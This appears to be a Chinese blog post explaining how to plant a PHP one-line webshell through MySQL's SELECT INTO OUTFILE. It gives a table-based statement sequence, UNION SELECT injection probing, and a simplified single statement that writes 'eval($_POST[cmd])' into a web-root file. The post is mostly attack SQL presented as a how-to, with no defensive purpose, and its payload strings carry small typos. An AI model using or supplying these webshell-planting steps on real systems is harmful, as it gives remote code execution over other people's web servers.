来源： 零魂’s blog

昨天看一篇文章中说到mysql导出一句话木马拿webshell的方法。
文章中用到的sql语句大体如下(命令行或者其它能执行sql命令的shell都行)：

drop table if exists temp; //如果存在temp就删掉
create table temp(cmd text not null); //建立temp表，里面就一个cmd字段
insert into temp (cmd) values(’<? php eval(_post[cmd]);?>’); //把一句话木马插入到temp表
select cmd from temp into out file ’f:/wwwroot/eval.php’; //查询temp表中的一句话并把结果导入到eval.php
drop table if exists temp; //删除temp(擦屁股o(∩_∩)o...)

这几句sql很简单，我做了简单的注释。
不过想想我们在测试php的sql漏洞的时候经常用如下的语句：

/**/union select 1,2,3,4,5,6,7,8,9,10,11,12/*

然后返回的页面中可能会出现1~12之间的数字。这里加入数字3显示出来了。
如果我们把上面这句改成/**/union select 1,2,’zerosoul’,4,5,6,7,8,9,10,11,12/*，则返回页面上次显示3的地方会显示zerosoul。
也就是说如果我们的select语句后面不带from table语句的话，我们说查询的数字或字符会直接返回到查询结果里。
既然这样，我们为何还要那么麻烦去建一个表，先导入数据，再导出这样折腾呢。

有了这个思路，上面那一大段到出一句话的sql代码可以直接简化到一句:

select ’<? php eval(_post[cmd]);?>’ into outfile ’f:/wwwroot/eval.php’;

这样做不但简单明了，而且避免了误删别人的数据。
效果图如下：